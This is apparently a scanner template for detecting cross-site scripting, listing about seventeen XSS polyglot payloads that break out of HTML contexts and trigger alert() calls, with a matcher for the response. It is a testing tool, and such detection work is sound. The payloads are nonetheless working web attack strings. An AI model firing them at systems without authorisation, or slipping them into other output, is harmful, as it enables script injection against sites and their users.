id: XSS
info:
  name: Cross Site Script
  severity: high
http:
  method: GET

  payload:
    - "/</title/'/</style/</script/--><p\" onclick=alert({{INT}})//>*/alert({{INT}})/*"
    - "javascript://--></title></style></textarea></script><svg \"//' onclick=alert({{INT}})//"
    - "javascript://'/</title></style></textarea></script>--><p\" onclick=alert({{INT}})//>*/alert({{INT}})/*"
    - "javascript://--></script></title></style>\"/</textarea>*/<alert({{INT}})/*' onclick=alert({{INT}})//>a"
    - "javascript://</title>\"/</script></style></textarea/-->*/<alert({{INT}})/*' onclick=alert({{INT}})//>/"
    - "javascript://</title></style></textarea>--></script><a\"//' onclick=alert({{INT}})//>*/alert({{INT}})/*"
    - "javascript://'//\" --></textarea></style></script></title><b onclick= alert({{INT}})//>*/alert({{INT}})/*"
    - "javascript://</title></textarea></style></script --><li '//\" '*/alert({{INT}})/*', onclick=alert({{INT}})//"
    - "javascript:alert({{INT}})//--></script></textarea></style></title><a\"//' onclick=alert({{INT}})//>*/alert({{INT}})/*"
    - "--></script></title></style>\"/</textarea><a' onclick=alert({{INT}})//>*/alert({{INT}})/*"
    - "/</title/'/</style/</script/</textarea/--><p\" onclick=alert({{INT}})//>*/alert({{INT}})/*"
    - "';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>"
    - "\" onclick=alert(({{INT}}))//<button ' onclick=alert(({{INT}}))//> */ alert(({{INT}}))//"
    - "<img src=\"test\" onerror=\"alert(50823)\"></img>"
    - "<img src=x onerror=alert(({{INT}}))>"
    - "<script>alert({{INT}})</script>"
    - "</script><script>alert({{INT}})</script>"
  
  matchers:
          - "alert({{INT}})"